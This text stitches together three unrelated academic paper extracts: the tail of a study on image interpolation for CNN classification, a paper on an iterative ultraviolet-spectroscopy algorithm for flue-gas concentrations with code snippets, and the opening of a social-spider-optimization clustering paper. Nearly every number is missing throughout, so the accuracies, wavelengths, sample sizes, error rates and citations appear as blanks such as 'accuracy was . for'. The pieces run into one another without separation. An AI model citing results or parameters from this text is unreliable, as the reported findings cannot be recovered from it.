. . . . a c c u ra c y b. train size= , resolution= × figure accuracy obtained with , training data. (a) × pixels; (b) × pixels. full-size doi: . /peerjcs. 
/fig- classification accuracy was the two-fold magnification method with an average classification accuracy of . for the box and the four-fold magnification method with an average classification accuracy of . for the bilinear. the mean classification accuracy was improved by up to . over the training model for the source image. the results obtained with data counts of , , , , , , , and , are shown in figs. , , , , and , respectively. in all cases, the data obtained when the image was enlarged and trained were more accurate than the original data. figure shows the results of training by increasing the number of data by rotating and inverting the image. here, for comparison, the results of training using the data obtained by the bilinear image interpolation method are also shown in fig. . the minimum average classification accuracy when rotating and inverting the data augmentation was . when the number of training data was . the maximum average classification accuracy was . when the number of training data was , . the minimum mean classification accuracy on performing data augmentation using the bilinear image interpolation method was . for training data and an image size of × . the maximum average classification accuracy was . for , training data and an image size of × . hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. train size . . . . . . . . a c c u ra c y a. flip and rotate train size . . . . . . a c c u ra c y b. bilinear × train size . . . . . a c c u ra c y c. bilinear × figure comparison of the classification accuracy between training models of data augmentation us- ing rotation and inversion and image augmentation using bilinear. (a) data augmentation by rotation and inversion, (b) bilinear × , (c) bilinear × . full-size doi: . /peerjcs. /fig- finally, the medical image results are shown in fig. . here, the average accuracy of × pixels was . , and the average accuracy of × pixels . to . . by doubling interpolation, the average accuracy improved by . to . . at × pixels, the average accuracy was . to . , which is an improvement of . to . with four-fold interpolation. at × pixels, the minimum accuracy was . , which was . less than the average. here, the minimum accuracy was . when the image was enlarged, which resulted in stability. discussion the obtained results demonstrate that as the number of image data used for training increases, the features of images that can be extracted by cnn also increases and the effect of increasing the features obtained by image interpolation decreases. from these results, it is considered that the effect of image interpolation is high even if the number of data used for training is small. although the wu et al. study is also due to color images, the true class is out of the top five predictions when models trained on × low-resolution images are used. hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. nearest × nearest × box bilinear hamming bicubic lanczos interpolation . . . . . . . . a c c u ra c y a. resolution= × nearest × nearest × box bilinear hamming bicubic lanczos interpolation . . . . . . . . a c c u ra c y b. resolution= × figure accuracy of chest radiograph gender classification dataset. (a) × pixels; (b) × pixels. full-size doi: . /peerjcs. 
/fig- high-resolution training at × captured more features of the predicted target and showed that it recognized images in second place (wu et al., ). moreover, by comparing two- and four-fold interpolations, we found that high accuracy was obtained with four-fold interpolation even if the number of data is less than , . however, if the number of data exceeded , , two-fold interpolation provided higher accuracy than the four-fold interpolation. although image data interpolation increased the feature value, effective information was not always generated by the interpolation process. thus, to improve the accuracy further, we consider that it is insufficient to only increase the feature value. in other words, the quality of the data must also be improved. this result demonstrates that when the number of data is large, unimportant information is included, which results in an inverse effect because many feature values are increased by the algorithm in the four-fold interpolation. from the results obtained using data augmentation by image inversion, image rotation, and image interpolation, we found that when there are many normal images in the original image data, the information created by these procedures does not function as valid data. thus, even though the number of data increases, the increased amount of data does not hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. result in improved accuracy. in addition, the accuracy improvement obtained using image interpolation was remarkable when the number of data was small; thus, we consider that image interpolation is an effective method to improve accuracy compared with the conventional method, i.e., rotation and inversion. conclusions in this paper, we investigated the effect of using interpolated image sizes for training data on the classification accuracy using five image interpolation methods on monochrome and low-quality fashion image data. for all methods, we confirmed that image interpolation combined with interpolation improved the accuracy and demonstrated that this approach was particularly effective with small amounts of data. for example, when the number of data was small, four-fold interpolation was effective, however, as the number data increased, two-fold interpolation demonstrated higher accuracy. furthermore, image interpolation was more accurate than data augmentation by rotation and inversion operations of the conventional method. thus, even though there is an optimal value for the increased image size, it can be considered that image interpolation is a more useful preprocessing technology than rotation and inversion operations. we expect that these results will have practical implications in image preprocessing technology in the medical field, where only a small amount of low-resolution data can be obtained. the proposed method is a preprocessing method that can be used by medical specialists without requiring machine learning technology. in addition, image classification can be further improved by utilizing the expertise on images. finally, we expect that the proposed method will contribute to the development of medical image classification technology by fusing medical specialist expertise and easy-to-use image interpolation preprocessing technology. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. 
author contributions • daisuke hirahara conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • eichi takaya conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • taro takahara and takuya ueda analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: the code used for the study is available as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references bakkouri i, afdel k. . multi-scale cnn based on region proposals for efficient breast abnormality recognition. multimedia tools and applications : – doi . /s - - -z. duchon ce. . lanczos filtering in one and two dimensions. journal of applied meteorology ( ): – doi . / - ( ) < :lfioat> . .co; . harris fj. . on the use of windows for harmonic analysis with the discrete fourier transform. proceedings of the ieee ( ): – doi . /proc. . . hendrycks d, mu n, cubuk ed, zoph b, glimer j, lakshminarayanan b. . augmix: a simple data processing method to improve robustness and uncertainty. in: proceedings of the international conference on learning representations. hijazi s, kumar r, rowen c. . using convolutional neural networks for image recognition. san jose: cadence design systems inc., – . keys r. . cubic convolution interpolation for digital image processing. ieee transactions on acoustics, speech, and signal processing ( ): – doi . /tassp. . . kyono t, gilbert fj, van der schaar m. . improving workflow efficiency for mammography using machine learning. journal of the american college of radiology ( ): – doi . /j.jacr. . . . lehmann tm, gonner c, spitzer k. . survey: interpolation methods in medical image processing. ieee transactions on medical imaging ( ): – doi . / . . poplin r, varadarajan av, blumer k, liu y, mcconnell mv, corrado gs, peng l, webster dr. . prediction of cardiovascular risk factors from retinal fundus photographs via deep learning. nature biomedical engineering ( ): – doi . /s - - - . samanta a, saha a, satapathy sc, fernandes sl, zhang y-d. . automated detection of diabetic retinopathy using convolutional neural networks on a small dataset. pattern recognition letters : – doi . /j.patrec. . . . shiraishi j, katsuragawa s, ikezoe j, matsumoto t, kobayashi t, komatsu k, matsui m, fujita h, kodera y, doi k. . development of a digital image database for chest radiographs with and without a lung nodule: receiver operating characteristic analysis of radiologists’ detection of pulmonary nodules. american journal of roentgenology : – doi . /ajr. . . . hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . / - ( ) < :lfioat> . .co; http://dx.doi.org/ . /proc. . http://dx.doi.org/ . /tassp. . http://dx.doi.org/ . /j.jacr. . . http://dx.doi.org/ . / . http://dx.doi.org/ . 
wu r, yan s, shan y, dang q, sun g. . deep image: scaling up image recognition. arxiv preprint. arxiv: . .
xiao h, rasul k, vollgraf r. . fashion-mnist: a novel image dataset for benchmarking machine learning algorithms. arxiv preprint. arxiv: . .
zhang h, cisse m, dauphin yn, lopez-paz d. . mixup: beyond empirical risk minimization. in: proceedings of the international conference on learning representations.
zhong z, zheng l, kang g, li s, yang y. . random erasing data augmentation. proceedings of the aaai conference on artificial intelligence ( ): – doi . /aaai.v i . .
zhou x, takayama r, wang s, hara t, fujita h. . deep learning of the sectional appearances of d ct images for anatomical structure segmentation based on an fcn voting method. medical physics ( ): – doi . /mp. .

international journal of advanced network, monitoring and controls volume , no. ,

the research of a new iteration of the circular algorithm

xu shuping, school of computer science and engineering, xi'an technological university, xi'an, , china, e-mail: @qq.com
huang menyao, school of computer science and engineering, xi'an technological university, xi'an, , china
chen li, school of computer science and engineering, xi'an technological university, xi'an, , china
xu pei, school of computer science and engineering, xi'an technological university, xi'an, , china

abstract—separating and calculating the concentrations of the individual gases from the continuous absorption spectrum of a mixed flue gas is a central problem in flue-gas spectral analysis. based on experimental data, a new iterative loop algorithm built on lambert-beer's law is put forward. the algorithm exploits the fact that different gases have different characteristic absorption peaks for ultraviolet light in the nm– nm band. the iteration is repeated until the difference between two adjacent concentration estimates of a gas is less than a preset value, at which point the exact concentration of that elemental gas is considered to have been obtained; the procedure is realized in software. the algorithm has strong anti-jamming capability and is suitable for practical engineering application.

keywords—circular iteration; characteristic absorption peak; iterative algorithm; gas concentration

i. introduction
with the growth of industrial production, centralized boiler heating, and the popularization of motor vehicles, large amounts of soot and toxic, harmful gases are discharged. hazardous substances gradually accumulate in the atmosphere and, once they reach a certain concentration, change the normal composition of the air and endanger the health of human beings, animals, and plants. the various problems caused by air pollution have attracted the attention of environmental protection departments. in order to monitor environmental quality, the ecological environment, and pollution sources accurately and in real time, and to provide an accurate basis for the supervision and management work of environmental protection departments at all levels and for governmental environmental decision-making, a large number of modern environmental monitoring instruments are urgently needed.
at present, there are three main methods for gas detection with portable spectrometers on domestic and foreign markets: the differential absorption algorithm, electrochemical analysis, and infrared spectroscopy. the differential absorption algorithm can accurately calculate the concentration of most gases, but it loses the broadband continuous absorption information in the characteristic absorption of a gas, so the concentrations of some gases cannot be measured. for example, the absorption spectrum of the nitrogen dioxide molecule in the ultraviolet band is mostly gradual, continuous absorption, so a differential absorption algorithm may treat the absorption information of nitrogen dioxide as if it had been filtered out by scattering, and nitrogen dioxide then escapes detection. likewise, if the absorption curves of nitric oxide and nitrogen dioxide share the same absorption peaks, the fitted absorption curves are superimposed at the measuring points, and the two gases still cannot be distinguished. the electrochemical analysis method has a simple structure and is easy to operate. it relies mainly on gas sensors; each sensor can detect only one corresponding gas, and although sensor sensitivity is initially high, it declines over time, so the sensors must be replaced regularly, and they are expensive, which raises the cost for users. the main principle of a gas sensor is to generate a current from the oxidation or reduction reaction of the gas, but if oxidizing and reducing gases are both present, the measurement results become inaccurate. infrared spectroscopy overcomes the shortcomings of electrochemical analysis, but it can only measure the approximate concentration of nitrogen oxides, it cannot accurately measure the specific concentrations of no and no2, and it places higher demands on environmental humidity, temperature, and other external conditions, making the technology more complex.

based on the defects and deficiencies of the above gas detection methods, an iterative gas solution algorithm is proposed in this paper. because gases absorb ultraviolet light well in the – nm band, the number of absorbed photons can be obtained by measuring the ultraviolet light absorbed by the gas, and the actual gas concentration can then be obtained from the photon counts with the iterative calculation algorithm.

ii. the principle and computational procedure of the iterative algorithm
a. algorithm principle
the mixed gases have characteristic absorption peaks in the ultraviolet range of – nm, and their absorbances superpose. assuming initially that no other gas absorbs at the best characteristic absorption peak of a given elemental gas, the absorbance-concentration table of that single gas is consulted to obtain an initial concentration for it; the analysis then switches to the characteristic absorption peak of another gas. the photon count attributable to the already-estimated gas is subtracted from the total measured photon count, and the initial concentration of the next gas is obtained. by analogy, an initial concentration is obtained for each gas in turn. the procedure then returns to the characteristic absorption peak of the first gas, subtracts the photons absorbed by all of the other gases from the total absorbed photon count, and obtains an iterated concentration of the first gas.
by analogy, an iterated concentration is obtained for each elemental gas again. the iteration is repeated until the difference between two adjacent estimates of a gas concentration is less than a preset value, at which point the concentration of that elemental gas is considered to have been found.

b. algorithm steps
1) solve the initial concentration c1 of the first elemental gas in the mixture. at the characteristic absorption peak of this gas, wavelength λ1, read the number of photons s absorbed by the gas and compute the absorbance a1(λ1) = lg((r − d) / (s − d)), where r is the number of incident photons, s is the number of photons passing through the medium, d is the number of dark-spectrum photons (dark spectral noise), λ is the ultraviolet wavelength, k is a constant, and c is the concentration of the elemental gas (by lambert-beer's law, the absorbance is determined by k and c). the initial concentration c1 is obtained by consulting the absorbance-concentration comparison table of this gas.
2) solve the initial concentration c2 of the second elemental gas. likewise, select the characteristic absorption peak λ2 of this gas and read its absorbed photon number s. assuming that only two gases absorb in this band, the absorbances superpose, lg((r − d) / (s − d)) = a1(λ2) + a2(λ2), so the absorbance of the second gas is a2(λ2) = lg((r − d) / (s − d)) − a1(λ2). the concentration of the second gas is then found from its absorbance-concentration table and taken as the initial concentration c2.
3) solve the concentrations of the other elemental gases in the mixture in the same way. select the characteristic absorption peak of each remaining gas, read the number of absorbed photons at that wavelength, and compute its absorbance as a_n(λ_n) = lg((r − d) / (s − d)) − Σ_{i≠n} a_i(λ_n), where a is absorbance; the initial concentration of the gas is obtained by looking up its table.
4) iteratively update the concentration of the first elemental gas. the concentrations of all elemental gases obtained so far are substituted into a1(λ1) = lg((r − d) / (s − d)) − Σ_{i≠1} a_i(λ1), the photon count s at wavelength λ1 is read again, and the iterated concentration c1 of the first elemental gas is obtained from its concentration-absorbance table.
5) repeat the two preceding steps to find the iterated concentration c_m of each elemental gas m.
6) calculate the error between the two most recent estimates of the same elemental gas; the first-order iteration error of each elemental gas is ε_m = |c_m′ − c_m|.
7) repeat the updating and error-calculation steps until the error between two successive iterations of the same gas concentration falls below the preset percentage threshold. the last calculated gas concentrations are taken as the final concentrations of the various elemental gases.
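the loop in steps 1)-7) can be written compactly. the following python sketch is purely illustrative: the lookup functions standing in for the absorbance-concentration comparison tables (conc_from_abs, abs_from_conc) and the per-wavelength photon counts are hypothetical placeholders, not the authors' implementation (their own code, given in section iv, is written in javascript).

    import math

    def absorbance(r, s, d):
        """total absorbance at one wavelength from incident (r), transmitted (s)
        and dark-spectrum (d) photon counts: a = lg((r - d) / (s - d))."""
        return math.log10((r - d) / (s - d))

    def solve_concentrations(photons, peaks, conc_from_abs, abs_from_conc,
                             tol=0.01, max_iter=50):
        """photons[wl] = (r, s, d) photon counts at wavelength wl;
        peaks[gas] = characteristic wavelength of that gas;
        conc_from_abs(gas, wl, a) and abs_from_conc(gas, wl, c) stand in for the
        absorbance/concentration comparison tables (hypothetical placeholders)."""
        total = {wl: absorbance(*photons[wl]) for wl in photons}
        conc = {gas: 0.0 for gas in peaks}              # initial estimates
        for _ in range(max_iter):
            prev = dict(conc)
            for gas, wl in peaks.items():
                # subtract the absorbance contributed by the other gases at this peak,
                # then look the remaining absorbance up in this gas's own table
                others = sum(abs_from_conc(g, wl, conc[g]) for g in peaks if g != gas)
                conc[gas] = conc_from_abs(gas, wl, total[wl] - others)
            # stop once two adjacent iterations agree to within the preset tolerance
            if all(abs(conc[g] - prev[g]) <= tol * max(abs(prev[g]), 1e-9) for g in peaks):
                break
        return conc

the tolerance and iteration cap are illustrative values; in the paper the loop stops when the error between two adjacent estimates falls below the preset percentage threshold.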
iii. algorithm verification
figure . mixed gas uv spectral absorption curve
fig. shows the absorption spectra of a mixture of no2, so2, nh3, and no. among them, n2 is a zero gas, whose spectral line is called the zero-gas line; the zero gas does not absorb ultraviolet light in the – nm band. because rayleigh scattering occurs in the gas under test, the influence of scattering can be eliminated by using the zero-gas spectrum as the reference spectrum. from the observation in fig. , we can see that no and nh3 have absorption wavelengths free of mutual interference: these two wavelengths are exactly the absorption peaks of no and nh3, there is no no absorption at the nh3 peak, and there is no nh3 absorption at the no peak, so the two gases would be easy to distinguish if only they were present. the problem is that so2 and no2 both absorb at the absorption peaks of these two gases: near nm the maximum absorption peaks of no2 and no lie close together, and so2 also absorbs a large amount of ultraviolet light in this section. if the concentrations of so2 and no2 are known beforehand, then, using the superposition of absorbances, their contributions can be subtracted from the total absorbance, leaving the absorbances of no and nh3, which can be converted to concentrations by table lookup. therefore, to obtain the specific concentration of every elemental gas in the mixture, the concentrations of so2 and no2 must be determined first, and the concentrations of no and nh3 can then be calculated; in this way the concentrations of all four elemental gases in the mixture are obtained.

a. calculating the concentrations of so2 and no2
no2 and so2 interfere with each other over the whole working band. assume now that the mixture contains only the two elemental gases no2 and so2. the absorption spectra of the mixture at the two working wavelengths are known, as are the absorbances of no2 and so2 at those wavelengths (these two wavelengths being, respectively, the wavelengths of maximum absorbance of no2 and so2). the task is to calculate the respective concentrations of no2 and so2.
figure . absorption spectra of so2 and no2
table i. spectral data (absorbance) for so2 and no2 at the two working wavelengths.
figure . flow chart of the iterative algorithm for the no2 and so2 gas concentrations
fig. is the flow chart of the iterative algorithm for the concentrations of the no2 and so2 mixture; after several iterations, the true concentrations of these two gases can be calculated from the mixture.
figure . so2 concentration versus number of iterations
figure . no2 concentration versus number of iterations
after two iterations the values produced by the algorithm become stable, and the precise gas concentrations of no2 and so2 are essentially obtained.

b. calculating the gas concentrations of no and nh3
there is no interference between no and nh3 at their maximum absorption peaks, so once the concentrations of no2 and so2 are known, their absorbances can be removed from the total by using the superposition of ultraviolet absorbances. assuming that the concentrations of no2 and so2 in the mixture are c1 and c2, respectively, and the concentrations of no and nh3 are c3 and c4, the multivariate superposition of absorbance at the no working wavelength can be written as a = a1 + a2 + a3, where a1 is the absorbance of no2 at that wavelength at concentration c1, a2 is the absorbance of so2 at that wavelength at concentration c2, a is the total absorbance of the mixed gas at that wavelength, and a3 is the absorbance of no at that wavelength. the total absorbance is a = lg(i0 / i), so a3 = lg(i0 / i) − a1 − a2, where i0 is the spectral intensity at that wavelength through the zero gas and i is the transmitted intensity through the mixture to be measured; both intensities are obtained directly from the spectrometer, and a1 and a2 are calculated from the concentrations of no2 and so2. in this way the absorbance a3 of no at its working wavelength is obtained, and the concentration of no is then read from the table relating no concentration and absorbance at that wavelength. the absorbance of nh3 is obtained by the same method at its own working wavelength, and the concentration of nh3 is calculated from the corresponding relationship between nh3 concentration and absorbance at that wavelength.
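as a small illustration of this subtraction step, the sketch below isolates the absorbance of one gas once the contributions of the gases whose concentrations are already known have been removed; the abs_from_conc lookup is a hypothetical stand-in for the concentration-absorbance tables used above.

    import math

    def isolate_absorbance(i_zero, i_mix, wavelength, known_conc, abs_from_conc):
        """a_total = lg(i_zero / i_mix) at this wavelength; subtracting the absorbances
        of the gases with already-known concentrations (here so2 and no2) leaves the
        absorbance of the remaining gas (no at its peak, nh3 at its peak)."""
        a_total = math.log10(i_zero / i_mix)
        return a_total - sum(abs_from_conc(gas, wavelength, c)
                             for gas, c in known_conc.items())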
c. composition of the platform experiment system
the ultraviolet flue gas analyzer consists of three parts: a flue-gas data acquisition module, a data processing module, and a data display module.
figure . experimental system composition diagram
the data acquisition module is composed of an ultraviolet light source and an ocean optics maya pro ultraviolet spectrometer. the ultraviolet light source outputs stable ultraviolet light, which travels through an optical fiber and then through the gas under test; after the gas has absorbed its share, the remaining ultraviolet light is carried by optical fiber into the ultraviolet spectrometer. after optical processing and photoelectric conversion in the spectrometer, the gas information becomes an electrical signal waiting to be read by the data processing module. in this system the ultraviolet spectrometer is, in effect, the flue-gas acquisition sensor. the data processing module is an embedded development board, which reads the gas information from the ultraviolet spectrometer, calculates the actual concentration of each elemental gas with the iterative algorithm, and visualizes it through the data display module. this is the composition and working principle of the experimental system.

d. absorption spectroscopy of the elemental gases and the zero gas
n2 is introduced into the system and its absorption spectrum is measured once the gas concentration is stable. after that, the numbers of photons absorbed by the no2, no, so2, and nh3 gases are measured in turn, and curves are drawn from the photon counts and wavelengths.
figure . photon spectrum lines of the four gases

e. data verification
the following data were obtained when a mixture of so2 and no2 was injected into the experimental system.
table ii. spectral data for so2 and no2 at ppm (columns: the two working wavelengths and the dark noise; rows: zero gas, so2 at ppm, zero gas, no2 at ppm).
table ii gives the numbers of absorbed photons and dark-noise photons at the two working wavelengths measured by the ultraviolet spectrometer for so2 and no2 at ppm, respectively.
table iii. spectral data for the mixed gas (columns: the two working wavelengths and the dark noise; rows: zero gas, mixed gas).
table iii gives the numbers of photons at the two working wavelengths for the zero gas and the mixed gas, together with the dark-spectrum noise photons measured by the spectrometer. in the practical calculation, the dark-spectrum noise photons must be subtracted from the measured photon counts to obtain the actual photon counts of the zero gas and the mixed gas. based on these data, the photon-count absorption curves of the elemental gases at their maximum absorption peaks are fitted.
figure . fitting curve of so2 at its maximum absorption wavelength
figure . fitting curve of no2 at its maximum absorption wavelength
figure . fitting curve of no at its maximum absorption wavelength
figure . fitting curve of nh3 at its maximum absorption wavelength
these figures show the curves drawn for each single gas at its maximum ultraviolet absorption wavelength. the analysis of the experimental results is given in table iv.
table iv. analysis of results (columns: gas species, standard value (ppm), measured value (ppm), difference value, maximum difference, error; rows: so2, no2, no, nh3).
the accuracy error is less than %, which meets the design standard. in table iv, the standard value is the concentration of the standard elemental gas supplied in the test, and the measured value is the concentration of that elemental gas calculated from the mixed gas by the iterative algorithm. the experimental results show that the deviation of the measured values from the standard values is small and that the maximum accuracy error, . %, is far below the original design standard of %, i.e., within the normal standard.

iv. software implementation
the software algorithm is written in javascript and covers the analysis and implementation of the iterative gas calculation. the main code is as follows:

    /* iterative calculation of gas concentrations */
    function getGasC() {
        // 1. total absorbance measured in the optimum band of no2
        var no2A_no2Band = getAbyWa(gasWaveBand['no2']);
        var no2C, no2A_so2Band, so2A_so2Band, so2C, so2A_no2Band, noA, nh3A;
        var MAX_ITER = 10; // illustrative iteration count; the published value is not reproduced here
        for (var i = 0; i < MAX_ITER; i++) {
            // 2. look up the no2 concentration for the current no2 absorbance
            no2C = getCbyA_data(no2_data_no2Band, no2A_no2Band);
            // 3. absorbance contributed by no2 in the optimum band of so2
            no2A_so2Band = getAbyC_data(no2_data_so2Band, no2C);
            // 4. total absorbance in the so2 band minus the no2 contribution
            so2A_so2Band = getAbyWa(gasWaveBand['so2']) - no2A_so2Band;
            // 5. look up the so2 concentration
            so2C = getCbyA_data(so2_data_so2Band, so2A_so2Band);
            // 6. absorbance contributed by so2 in the no2 band
            so2A_no2Band = getAbyC_data(so2_data_no2Band, so2C);
            // 7. no2 absorbance = total absorbance in the no2 band minus the so2 contribution
            no2A_no2Band = getAbyWa(gasWaveBand['no2']) - so2A_no2Band;
        }
        currentGasC_no2 = no2C;
        currentGasC_so2 = so2C;
        // absorbance of no in its optimum band = total absorbance there
        // minus the no2 and so2 contributions
        noA = getAbyWa(gasWaveBand['no'])
            - getAbyC_data(no2_data_noBand, no2C)
            - getAbyC_data(so2_data_noBand, so2C);
        currentGasC_no = getCbyA_data(no_data_noBand, noA);
        // same subtraction for nh3 in its optimum band
        nh3A = getAbyWa(gasWaveBand['nh3'])
            - getAbyC_data(no2_data_nh3Band, no2C)
            - getAbyC_data(so2_data_nh3Band, so2C);
        currentGasC_nh3 = getCbyA_data(nh3_data_nh3Band, nh3A);
        $("#no2_c").html("no2 " + currentGasC_no2);
        $("#so2_c").html("so2 " + currentGasC_so2);
        $("#no_c").html("no " + currentGasC_no);
        $("#nh3_c").html("nh3 " + currentGasC_nh3);
    }

v. conclusion
aiming at the requirement of detecting the main harmful components of air pollution, a fast iterative algorithm for mixed flue gas is designed using the continuous frequency-division method of an ultraviolet grating in the experimental system, and the effectiveness of the algorithm is verified. the ultraviolet spectrometer is used as the sensor, the embedded development board reads the data and calculates the gas concentrations, and the analysis and calculation of the algorithm are realized in software. the results show that the iterative algorithm can accurately measure the concentration of flue gas and keep the error within %; it meets the design requirements, solves for several kinds of gases at the same time, and is suitable for practical engineering applications.

acknowledgment
thank you, shaanxi education department. this work was supported in part by a grant from the shaanxi provincial department of education project ( jf ). the authors wish to thank the cooperators.
this research is partially funded by the project funds of the shanxi province department of education ( jf ), the engineering laboratory project (gsysj ), and the innovation and entrepreneurship training project for college students ( ).

about the author
xu shuping ( -), female, professor, school of computer science and engineering, xi'an technological university, majoring in embedded systems and computer control. email: @qq.com, mobile: .

references
[1] chen zhi-gang. discussion on experimental application of lambert-beer law [j]. acta metrologica sinica. ( )
[2] pop, paul. embedded systems design: optimization challenges. lecture notes in computer science, , ( ): -
[3] shi bao-song, sun shou-hong, zhang wei. application of ccd in the portable spectrometer [j]. electronic measurement technology. ( )
[4] limited arm development guide - . arm doi. . .
[5] tang qu. research and design of ultraviolet flue gas analyzer [j]. nanjing university of technology.
[6] jiang xuqian. design of portable ultraviolet flue gas analyzer [j]. nanjing university of technology.
[7] chen bin. design of ultraviolet flue gas analyzer [j]. nanjing university of technology.
[8] ju wu, wu yihui. micro-miniaturization of spectrometer [j]. journal of instrumentation, . ( ): -
[9] yu zhiqiang, wenzhi yu, xie yingke, zhou suyi. the control system of multi-parameter water quality tester based on raspberry pi [j]. instrumentation technology and sensors, ( ): - .
[10] han xiao, wenzhi yu, xie yingke, wei kanglin, zhou xiaofeng. software design of control and signal processing system for multi-parameter water quality tester [j]. instrumentation technology and sensors, ( ): -

a novel variant of social spider optimization using single centroid representation and enhanced mating for data clustering
ravichandran thalamala, janet barnabas and a.v. reddy
department of computer applications, national institute of technology, trichy, india

abstract
nature-inspired algorithms are based on the concepts of self-organization and complex biological systems. they have been designed by researchers and scientists to solve complex problems in various environmental situations by observing how naturally occurring phenomena behave. the introduction of nature-inspired algorithms has led to new branches of study such as neural networks, swarm intelligence, evolutionary computation, and artificial immune systems. particle swarm optimization (pso), social spider optimization (sso), and other nature-inspired algorithms have found some success in solving clustering problems, but they may converge to local optima due to the lack of balance between exploration and exploitation. in this paper, we propose a novel implementation of sso, namely social spider optimization for data clustering using single centroid representation and enhanced mating operation (ssodcsc), in order to improve the balance between exploration and exploitation. in ssodcsc, we implemented each spider as a collection of a centroid and the data instances close to it. we allowed non-dominant male spiders to mate with female spiders by converting them into dominant males. we found that ssodcsc produces better values for the sum of intra-cluster distances, the average cpu time per iteration (in seconds), accuracy, the f-measure, and the average silhouette coefficient as compared with k-means and other nature-inspired techniques.
when the proposed algorithm is compared with other nature-inspired algorithms on the patent corpus datasets, the overall percentage increase in accuracy is approximately %; when it is compared with other nature-inspired algorithms on the uci datasets, the overall percentage increase in the f-measure value is approximately %. for completeness, the best k cluster centroids (the best k spiders) returned by ssodcsc are specified. to show the significance of the proposed algorithm, we conducted a one-way anova test on the accuracy values and the f-measure values returned by the clustering algorithms.

subjects agents and multi-agent systems, artificial intelligence, data mining and machine learning
keywords social spider optimization, nature inspired algorithms, swarm intelligence, single cluster approach, data clustering, cluster centroids

how to cite this article thalamala r, barnabas j, reddy av. . a novel variant of social spider optimization using single centroid representation and enhanced mating for data clustering. peerj comput. sci. :e doi . /peerj-cs.
submitted february, accepted june, published july
corresponding author ravichandran thalamala, sirichandran @gmail.com
academic editor yilun shang
additional information and declarations can be found on page
copyright thalamala et al., distributed under creative commons cc-by .

introduction
data clustering is one of the most popular unsupervised classification techniques in data mining. it rearranges the given data instances into groups such that similar data instances are placed in the same group while dissimilar data instances are placed in separate groups (bernábe-loranca et al., ). data clustering identifies the groups present in a data set, each of which contains related data instances. network clustering identifies the groups present in a computer network, each of which contains highly connected computers. network clustering returns the various topological structures present in a computer network, as shown in fig. , whereas data clustering returns cluster sets of related data instances. the quality of data clustering is measured using metrics such as intra-cluster distances (icd), inter-cluster distances, the f-measure, and accuracy; the quality of network clustering is measured using metrics such as the global clustering coefficient and the average of the local clustering coefficients. data clustering is an np-hard problem (aloise et al., ) with the objective of minimizing icd within the clusters and maximizing inter-cluster distances across the clusters (steinley, ). a dataset ds is a collection of data instances, and each data instance in ds can be represented by a data vector. in a dataset of text files, each text file is a data instance and can be represented as a data vector using mechanisms like term frequency-inverse document frequency (tf-idf) (beil, ester & xu, ). in this paper, we use the terms "data instance" and "data vector" interchangeably and define clustering as a minimization problem that minimizes the sum of intra-cluster distances (sicd). clustering forms a set of k clusters.
let cl be the set of k clusters for which the sicd is minimized. the mathematical model of the clustering problem can be defined as shown in eq. (1); the clustering function f takes ds and returns cl after minimizing the sicd:

minimize f(ds, cl) = Σ_{i=1}^{k} Σ_{j=1}^{n_i} distance(c_i, dv_{i,j})    (1)

in eq. (1), distance is the distance function that returns the distance between two given data vectors, dv_{i,j} is the jth data vector present in the ith cluster of cl, n_i is the number of data vectors present in the ith cluster of cl, and c_i is the centroid of the ith cluster of cl.

figure . topological structures present in a computer network: network clustering. the figure specifies the resultant topological structures when network clustering is applied to a computer network.

the classical clustering algorithms are categorized into hierarchical and partitional algorithms. the main drawback of hierarchical clustering is that the clusters formed in an iteration cannot be undone in later iterations (rani & rohil, ). k-means is one of the simplest partitional algorithms (mihai & mocanu, ), but it has two drawbacks: the number of clusters to be formed must be specified a priori, and it generally produces locally optimal solutions because of its high dependency on the initial centroids. examples of other classical clustering algorithms are birch (zhang, ramakrishnan & livny, ), cure (guha, rastogi & shim, ), clarans (ng & han, ), and chameleon (karypis, han & kumar, ). classical algorithms suffer from drawbacks such as convergence to local optima, sensitivity to initialization, and a high computational effort to reach the global optimum. to overcome these problems, nature-inspired metaheuristic algorithms are now used for data clustering. in this study, we investigated the performance of social spider optimization (sso) for data clustering using a single centroid representation and an enhanced mating operation. the algorithm was evaluated on the patent corpus datasets and on uci datasets. each data instance in a uci dataset is already a data vector, but the data instances in the patent corpus datasets are text files; before applying the proposed algorithm to these datasets, the text files were represented as data vectors using the tf-idf mechanism. the vector representation of the ith data instance dv_i present in the dataset ds can be specified using eq. (2):

dv_i = (w_{i,1}, w_{i,2}, w_{i,3}, ..., w_{i,t})    (2)

in eq. (2), w_{i,j} is the term weight of the jth distinguishable term of the dataset ds in the ith data instance, and t is the total number of distinguishable terms in the dataset ds. the term weight w_{i,j} can be computed using eq. (3):

w_{i,j} = tf_{i,j} × idf_j    (3)

in eq. (3), tf_{i,j} (the term frequency of the jth distinguishable term of ds in the ith data instance) is the number of times the jth distinguishable term of ds occurs in the ith data instance, and idf_j is the inverse document frequency of the jth distinguishable term of ds. idf_j can be calculated using eq. (4):

idf_j = log(n / m)    (4)

in eq. (4), n is the total number of data instances in ds and m is the number of data instances in which the jth distinguishable term of the dataset ds is present.
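as a concrete illustration of eqs. (2)-(4), the short python sketch below builds tf-idf vectors for a toy list of tokenized documents. it is only a sketch of the weighting scheme described above, with an arbitrarily chosen logarithm base, and is not the preprocessing pipeline used in the paper.

    import math
    from collections import Counter

    def tfidf_vectors(docs):
        """docs: list of token lists. returns one weight vector per document,
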